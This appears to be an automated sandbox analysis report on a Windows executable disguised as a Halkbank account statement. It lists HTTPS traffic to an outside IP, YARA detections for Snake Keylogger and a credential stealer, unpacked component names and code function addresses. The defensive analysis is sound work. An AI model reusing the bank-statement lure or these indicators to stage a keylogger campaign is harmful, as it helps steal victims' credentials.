                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49726 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 3664, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Halkbank_Ekstre_20230426_075819_154055.exe PID: 6052, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 0_2_0255D4240_2_0255D424
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 0_2_027040AA0_2_027040AA
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 0_2_027000400_2_02700040
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 0_2_027000070_2_02700007
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 0_2_06D4C1E00_2_06D4C1E0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 0_2_06D46A000_2_06D46A00
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 0_2_06D400400_2_06D40040
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 0_2_06D4A8780_2_06D4A878
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 0_2_06D400060_2_06D40006
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_007AACC03_2_007AACC0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_007AD89C3_2_007AD89C
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_007AFA503_2_007AFA50
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_007ABFEC3_2_007ABFEC
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_00E147583_2_00E14758
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100C1F03_2_0100C1F0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100B3883_2_0100B388
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100C4D03_2_0100C4D0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100C7B23_2_0100C7B2
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_010098483_2_01009848
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_010068E03_2_010068E0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_01004B313_2_01004B31
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100CA923_2_0100CA92
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100BC323_2_0100BC32
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100BF103_2_0100BF10
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100B5523_2_0100B552
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_010035CA3_2_010035CA
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100F4E83_2_0100F4E8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100F9413_2_0100F941
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100E9F83_2_0100E9F8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0100EA083_2_0100EA08
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06620C603_2_06620C60
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066200403_2_06620040
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066290803_2_06629080
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066244903_2_06624490
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662F5283_2_0662F528
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06621DE03_2_06621DE0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066289B03_2_066289B0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662D2683_2_0662D268
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662D2583_2_0662D258
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662CE013_2_0662CE01
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662CE103_2_0662CE10
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662D6C03_2_0662D6C0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662D6B03_2_0662D6B0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662DF603_2_0662DF60
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662DF703_2_0662DF70
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662DB0A3_2_0662DB0A
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662DB183_2_0662DB18
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662E3C83_2_0662E3C8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662E3B93_2_0662E3B9
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662EC693_2_0662EC69
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662EC783_2_0662EC78
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06620C503_2_06620C50
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662E8203_2_0662E820
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066200063_2_06620006
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066280083_2_06628008
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662E8123_2_0662E812
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662C0F73_2_0662C0F7
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066210C03_2_066210C0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662F0C03_2_0662F0C0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662F0D03_2_0662F0D0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066210B03_2_066210B0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066244803_2_06624480
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662C5603_2_0662C560
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066219703_2_06621970
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662F9713_2_0662F971
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662C5503_2_0662C550
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066215203_2_06621520
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662C1083_2_0662C108
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066215103_2_06621510
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662F5183_2_0662F518
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06621DD03_2_06621DD0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662C9A93_2_0662C9A9
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662C9B83_2_0662C9B8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066219803_2_06621980
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0662F9803_2_0662F980
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06638A583_2_06638A58
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663CE283_2_0663CE28
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663DAC03_2_0663DAC0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663AEA83_2_0663AEA8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663BB383_2_0663BB38
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663C7D83_2_0663C7D8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663D4783_2_0663D478
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663A8583_2_0663A858
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663B4F03_2_0663B4F0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066390A13_2_066390A1
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066315F83_2_066315F8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663C1883_2_0663C188
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06635A683_2_06635A68
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06638A483_2_06638A48
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06635A583_2_06635A58
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066386003_2_06638600
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663CE183_2_0663CE18
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06635EC03_2_06635EC0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663DAAF3_2_0663DAAF
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06635EB23_2_06635EB2
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066367603_2_06636760
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066367703_2_06636770
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663BB273_2_0663BB27
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066363083_2_06636308
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066363183_2_06636318
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066337FA3_2_066337FA
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663C7CB3_2_0663C7CB
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06636BC83_2_06636BC8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06636BB83_2_06636BB8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06633B803_2_06633B80
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066300403_2_06630040
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06632C573_2_06632C57
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066370203_2_06637020
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066300073_2_06630007
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066338083_2_06633808
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066370103_2_06637010
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066308E13_2_066308E1
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066378E73_2_066378E7
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066308F03_2_066308F0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066378F83_2_066378F8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066374A03_2_066374A0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066348803_2_06634880
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066304883_2_06630488
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066374903_2_06637490
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066304983_2_06630498
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663C1783_2_0663C178
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06637D403_2_06637D40
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06630D483_2_06630D48
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06637D503_2_06637D50
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06630D383_2_06630D38
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_06632D003_2_06632D00
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066355E83_2_066355E8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066385F13_2_066385F1
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066355DA3_2_066355DA
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066311A03_2_066311A0
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066381A83_2_066381A8
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_066311913_2_06631191
                  Source: C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exeCode function: 3_2_0663819A3_2_0663819A
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1980117407.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1978545566.000000000080E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.2001619425.0000000006AD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000000.1967619527.0000000000394000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekrUK.exe: vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.2002294197.0000000007300000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000000.00000002.1980117407.0000000002771000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dllD vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3220219789.0000000000AF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exe, 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeBinary or memory string: OriginalFilenamekrUK.exe: vs Halkbank_Ekstre_20230426_075819_154055.exe
                  Source: Halkbank_Ekstre_20230426_075819_154055.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.Halkbank_Ekstre_20230426_075819_154055.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a3c618.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Halkbank_Ekstre_20230426_075819_154055.exe.3a1bbf8.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
